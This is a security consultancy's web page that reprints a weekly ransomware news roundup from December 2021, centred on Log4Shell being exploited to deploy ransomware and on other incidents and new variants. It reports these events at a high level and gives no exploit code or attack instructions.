Frame-14

Privacy Ninja

        • DATA PROTECTION

        • CYBERSECURITY

        • Secure your network against various threat points. VA starts at only S$1,000, while VAPT starts at S$4,000. With Price Beat Guarantee!

        • API Penetration Testing

        • Enhance your digital security posture with our approach that identifies and addresses vulnerabilities within your API framework, ensuring robust protection against cyber threats targeting your digital interfaces.

        • On-Prem & Cloud Network Penetration Testing

        • Boost your network’s resilience with our assessment that uncovers security gaps, so you can strengthen your defences against sophisticated cyber threats targeting your network

        • Web Penetration Testing

        • Fortify your web presence with our specialised web app penetration testing service, designed to uncover and address vulnerabilities, ensuring your website stands resilient against online threats

        • Mobile Penetration Testing

        • Strengthen your mobile ecosystem’s resilience with our in-depth penetration testing service. From applications to underlying systems, we meticulously probe for vulnerabilities

        • Cyber Hygiene Training

        • Empower your team with essential cybersecurity knowledge, covering the latest vulnerabilities, best practices, and proactive defence strategies

        • Thick Client Penetration Testing

        • Elevate your application’s security with our thorough thick client penetration testing service. From standalone desktop applications to complex client-server systems, we meticulously probe for vulnerabilities to fortify your software against potential cyber threats.

        • Source Code Review

        • Ensure the integrity and security of your codebase with our comprehensive service, meticulously analysing code quality, identifying vulnerabilities, and optimising performance for various types of applications, scripts, plugins, and more

        • Email Spoofing Prevention

        • Check if your organisation’s email is vulnerable to hackers and put a stop to it. Receive your free test today!

        • Email Phishing Excercise

        • Strengthen your defense against email threats via simulated attacks that test and educate your team on spotting malicious emails, reducing breach risks and boosting security.

        • Cyber Essentials Bundle

        • Equip your organisation with essential cyber protection through our packages, featuring quarterly breached accounts monitoring, email phishing campaigns, cyber hygiene training, and more. LAUNCHING SOON.

I'VE BEEN BREACHED

The Week in Ransomware – December 17th 2021 – Enter Log4j

The Week in Ransomware – December 17th 2021 – Enter Log4j

A critical Apache Log4j vulnerability took the world by storm this week, and now it is being used by threat actors as part of their ransomware attacks.

Last Friday, a researcher publicly released an exploit for the Log4j vulnerability, dubbed ‘Log4Shell.’ after it was already seen targeting vulnerable Minecraft servers.

While a patch was quickly released to fix the vulnerability, researchers and threat actors quickly began scanning for and exploiting vulnerable devices. With how fast it was adopted, it was only a matter of time until threat actors used it to deploy ransomware.

It didn’t take long, as threat actors revived an old ransomware named TellYouThePass on Monday and began distributing it via Log4j exploits.

Also Read: Data Minimization; Why Bigger is Not Always Better

Soon after, another ransomware (or wiper) called Khonsari was discovered that we later learned it was targeting vulnerable Minecraft servers.

Finally, a report today shows how the Conti ransomware gang is using the Log4j vulnerability to quickly gain access to internal VMWare vCenter servers to encrypt virtual machines.

Other ransomware news

While the Log4j vulnerability has taken up most of the cybersecurity community’s time this week, there have been other significant developments as well.

Romanian police arrested a ransomware affiliate for hacking and stealing sensitive info from the networks of multiple high-profile companies worldwide.

Emotet also began distributing Cobalt Strike beacons as a primary payload, allowing ransomware gangs quicker access to compromised networks to conduct attacks.

We also learned that the Hive Ransomware operation is becoming a major player after breaching hundreds of companies in just four months.

Finally, a massive ransomware attack against HR services provider Kronos has caused significant impact for many companies who use them for timekeeping and payroll. We also saw a Conti attack on McMenamins breweries, showing that nothing is sacred.

Contributors and those who provided new ransomware information and stories this week include: @LawrenceAbrams@DanielGallagher@PolarToffee@jorntvdw@malwrhunterteam@demonslay335@VK_Intel@malwareforme@serghei@Seifreed@FourOctets@struppigel@Ionut_Ilascu@fwosar@BleepinComputer@billtoulas@SANGFOR@CuratedIntel@80vul@1ZRR4H@AdvIntel@MsftSecIntel@GroupIB_GIB@Bitdefender_Ent@Cryptolaemus1@JRoosen@BroadcomS@fbgwls245@Amigo_A_,@JakubKroustek, and @pcrisk.

December 11th 2021

New STOP Ransomware variant

Jakub Kroustek found a new STOP ransomware variant that appends the .yjqs extension to encrypted files.

Also Read: Vulnerability Management For Cybersecurity Dummies

December 13th 2021

Police arrests ransomware affiliate behind high-profile attacks

Romanian law enforcement authorities arrested a ransomware affiliate suspected of hacking and stealing sensitive info from the networks of multiple high-profile companies worldwide, including a large Romanian IT company with clients from the retail, energy, and utilities sectors.

Kronos ransomware attack may cause weeks of HR solutions downtime

Workforce management solutions provider Kronos has suffered a ransomware attack that will likely disrupt many of their cloud-based solutions for weeks.

December 14th 2021

New ransomware now being deployed in Log4Shell attacks

The first public case of the Log4j Log4Shell vulnerability used to download and install ransomware has been discovered by researchers.

New White Rabbit ransomware

Michael Gillespie is looking for a sample of the new White Rabbit ransomware that appends the .scrypt extension.

Whtie Rabbit ransomware

December 15th 2021

Emotet starts dropping Cobalt Strike again for faster attacks

Right in time for the holidays, the notorious Emotet malware is once again directly installing Cobalt Strike beacons for rapid cyberattacks.

New STOP Ransomware variant

PCrisk found a new STOP ransomware variant that appends the .Shgv extension to encrypted files.

December 16th 2021

Hive ransomware enters big league with hundreds breached in four months

The Hive ransomware gang is more active and aggressive than its leak site shows, with affiliates attacking an average of three companies every day since the operation became known in late June.

McMenamins breweries hit by a Conti ransomware attack

Portland brewery and hotel chain McMenamins suffered a Conti ransomware attack over the weekend that disrupted the company’s operations.

Microsoft: Khonsari ransomware hits self-hosted Minecraft servers

Microsoft urges admins of self-hosted Minecraft servers to upgrade to the latest release to defend against Khonsari ransomware attacks exploiting the critical Log4Shell security vulnerability.

Noberus: Technical Analysis Shows Sophistication of New Rust-based Ransomware

Symantec, a division of Broadcom Software, tracks this ransomware as Ransom.Noberus and our researchers first spotted it on a victim organization on November 18, 2021, with three variants of Noberus deployed by the attackers over the course of that attack. This would appear to show that this ransomware was active earlier than was previously reported, with MalwareHunterTeam having told BleepingComputer they first saw this ransomware on November 21.

New STOP Ransomware variant

PCrisk found a new STOP ransomware variant that appends the .hudf extension to encrypted files.

December 17th 2021

Conti ransomware uses Log4j bug to hack VMware vCenter servers

Conti ransomware operation is using the critical Log4Shell exploit to gain rapid access to internal VMware vCenter Server instances and encrypt virtual machines.

Logistics giant warns of BEC emails following ransomware attack

Hellmann Worldwide is warning customers of an increase in fraudulent calls and emails regarding payment transfer and bank account changes after a recent ransomware attack.

TellYouThePass ransomware revived in Linux, Windows Log4j attacks

Threat actors have revived an old and relatively inactive ransomware family known as TellYouThePass, deploying it in attacks against Windows and Linux devices targeting a critical remote code execution bug in the Apache Log4j library.

New Dharma Ransomware variant

dnwls0719 found a new Dharma ransomware variant that appends the .C1024 extension to encrypted files.

That’s it for this week! Hope everyone has a nice weekend!

0 Comments

Let us help you out.

Grab your free consultation NOW!

Privacy Ninja

Data Protection​

Cybersecurity

Support

Company

Locations

Singapore

7 Temasek Boulevard
#12-07, Suntec Tower One
Singapore 038987

Thailand

The Royal Place 1
2, 2/399 Mahatlek Luang 1 Alley, Lumphini, Pathum Wan, Bangkok 10330, Thailand



email-icon
Facebook Twitter Linkedin Youtube

KEEP IN TOUCH

Subscribe to our mailing list to get free tips on Data Protection and Data Privacy updates weekly!

Personal Data Protection

REPORTING DATA BREACH TO PDPC?

We have assisted numerous companies to prepare proper and accurate reports to PDPC to minimise financial penalties.
TALK TO US
×

Hello!

Click one of our contacts below to chat on WhatsApp

Social Chat is free, download and try it now here!

× Chat with us